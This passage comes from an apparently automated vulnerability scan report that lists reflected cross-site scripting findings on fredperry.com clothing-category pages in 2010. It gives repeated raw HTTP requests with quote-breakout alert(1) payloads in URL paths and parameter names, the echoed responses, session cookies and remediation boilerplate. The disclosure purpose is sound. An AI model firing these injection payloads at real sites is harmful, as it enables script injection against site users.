GET /mena64af"-alert(1)-"3a1a3b3a61c/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:01:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=u37p1ocep3e9f3icao3s3icac4; expires=Tue, 09-Nov-2010 17:01:31 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/mena64af"-alert(1)-"3a1a3b3a61c/knitwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4c2"-alert(1)-"ba5b05c538c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/knitwear6b4c2"-alert(1)-"ba5b05c538c/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:01:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=64rrfdccnav5m7b6pccdkibtl1; expires=Tue, 09-Nov-2010 17:01:57 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men/knitwear6b4c2"-alert(1)-"ba5b05c538c/"); //]]> ...[SNIP]...
1.213. http://www.fredperry.com/men/knitwear/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/knitwear/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2b99"-alert(1)-"b505e6d38e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/knitwear/?e2b99"-alert(1)-"b505e6d38e3=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d63e5"-alert(1)-"f5e78f500b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mend63e5"-alert(1)-"f5e78f500b1/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:01:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=smj18gun57kdkd0467j6k2ble0; expires=Tue, 09-Nov-2010 17:01:26 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/mend63e5"-alert(1)-"f5e78f500b1/shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c7c4"-alert(1)-"ab334987f53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/shirts1c7c4"-alert(1)-"ab334987f53/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:01:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=q7shd2ampm5hb37fpk1t5lpef0; expires=Tue, 09-Nov-2010 17:01:45 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men/shirts1c7c4"-alert(1)-"ab334987f53/"); //]]> ...[SNIP]...
1.216. http://www.fredperry.com/men/shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89931"-alert(1)-"4ce4c5dd22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/shirts/?89931"-alert(1)-"4ce4c5dd22=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f6f"-alert(1)-"8259a03e431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men98f6f"-alert(1)-"8259a03e431/t-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:02:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=cpnpt2cakueaginagvi7a3ccr3; expires=Tue, 09-Nov-2010 17:02:06 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men98f6f"-alert(1)-"8259a03e431/t-shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee9e"-alert(1)-"5e40d014b78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/t-shirts9ee9e"-alert(1)-"5e40d014b78/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:02:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=s9pds8t8hgp1kss83ab38dr1n7; expires=Tue, 09-Nov-2010 17:02:21 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men/t-shirts9ee9e"-alert(1)-"5e40d014b78/"); //]]> ...[SNIP]...
1.219. http://www.fredperry.com/men/t-shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/t-shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7b5e"-alert(1)-"444542d087e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/t-shirts/?a7b5e"-alert(1)-"444542d087e=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b32d8"-alert(1)-"8e055ac8dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /menb32d8"-alert(1)-"8e055ac8dec/tennis/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 15:59:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=f0fa2f8e8h2rpes2q3rqh16836; expires=Tue, 09-Nov-2010 16:59:12 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/menb32d8"-alert(1)-"8e055ac8dec/tennis/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9404e"-alert(1)-"ba168a9b142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/tennis9404e"-alert(1)-"ba168a9b142/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 15:59:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ijktja01c1msmhc06ponorhte7; expires=Tue, 09-Nov-2010 16:59:31 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men/tennis9404e"-alert(1)-"ba168a9b142/"); //]]> ...[SNIP]...
1.222. http://www.fredperry.com/men/tennis/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/tennis/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3032"-alert(1)-"08334eb7cc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/tennis/?b3032"-alert(1)-"08334eb7cc3=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b540b"-alert(1)-"d6d90d603e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /menb540b"-alert(1)-"d6d90d603e1/track-jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:01:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=2lp41odj8d5fkstds9t06rrt80; expires=Tue, 09-Nov-2010 17:01:56 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/menb540b"-alert(1)-"d6d90d603e1/track-jackets/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f64a"-alert(1)-"cbf3aada87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/track-jackets9f64a"-alert(1)-"cbf3aada87/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:02:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=k8brnmco109mo4fdmvep7dio44; expires=Tue, 09-Nov-2010 17:02:32 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men/track-jackets9f64a"-alert(1)-"cbf3aada87/"); //]]> ...[SNIP]...
1.225. http://www.fredperry.com/men/track-jackets/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/track-jackets/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e0d1"-alert(1)-"d9c3a859d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/track-jackets/?3e0d1"-alert(1)-"d9c3a859d62=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32758"-alert(1)-"88339fcc816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men32758"-alert(1)-"88339fcc816/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:01:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=agnd4mrumvubq89l712rq44e55; expires=Tue, 09-Nov-2010 17:01:52 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men32758"-alert(1)-"88339fcc816/trousers/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641ae"-alert(1)-"0f8046e452d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/trousers641ae"-alert(1)-"0f8046e452d/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:02:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=tm365jrdhtskqa9asf90no4sp0; expires=Tue, 09-Nov-2010 17:02:14 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men/trousers641ae"-alert(1)-"0f8046e452d/"); //]]> ...[SNIP]...
1.228. http://www.fredperry.com/men/trousers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/trousers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c177f"-alert(1)-"7e003bc6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
